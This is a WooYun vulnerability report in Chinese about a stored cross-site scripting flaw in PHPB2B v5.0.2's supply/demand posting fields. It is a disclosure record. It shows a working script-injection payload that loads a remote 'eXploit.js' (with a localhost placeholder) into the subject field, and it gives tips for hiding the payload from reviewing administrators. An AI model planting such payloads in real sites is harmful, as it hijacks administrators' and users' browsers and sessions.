漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-065109
漏洞标题:PHPB2B存储型跨站(可打管理员和任意用户)
相关厂商:phpb2b.com
漏洞作者: dilcon
提交时间:2014-06-16 12:29
修复时间:2014-06-21 12:29
公开时间:2014-06-21 12:29
漏洞类型:xss跨站脚本攻击
危害等级:高
自评Rank:15
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-06-16: 细节已通知厂商并且等待厂商处理中
2014-06-21: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
PHPB2B v5.0.2对字段过滤不严格导致存储型跨站,可嵌入任意脚本文件,攻击管理员和任意用户。
详细说明:
1、phpB2B对用户发布供求信息模块,没有进行有效过滤,存在漏洞的字段包括主题、包装说明、价格说明等等。攻击者可以插入恶意代码,后台管理员审核用户供求信息时,漏洞触发,审核过程中,管理员并不会发现任何恶意代码,审核一旦成功,其它任何用户浏览供求信息时,便会触发漏洞。
通杀所有浏览器。
漏洞证明:
1、以发布供求信息主题字段为例进行说明。
2、用户进入商务室进行发布供求信息
3、在主题字段嵌入如下恶意代码:
<script src=http://127.0.0.1/eXploit.js></script>
4、管理员审核用户供求信息,进入审核页面时,漏洞便可触发:
5、查看页面源代码,成功嵌入恶意脚本
6、审核通过,其它用户浏览供求信息,漏洞触发
7、查看页面源代码,成功嵌入恶意脚本
利用主题字段,我们可以更好的攻击系统管理员,为了更好的隐藏恶意代码,我们可以适当增加主题字段长度,当然我们可以利用其它字段进行攻击,其它字段对恶意代码的隐藏性更好,管理员应该完全注意不到恶意代码的存在,例如包装说明等字段,这样审核通过后,我们便可攻击其它任意用户,此处便不再详细说明
修复方案:
对发布供求信息的各字段进行有效过滤
版权声明:转载请注明来源 dilcon@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-06-21 12:29
厂商回复:
最新状态:
暂无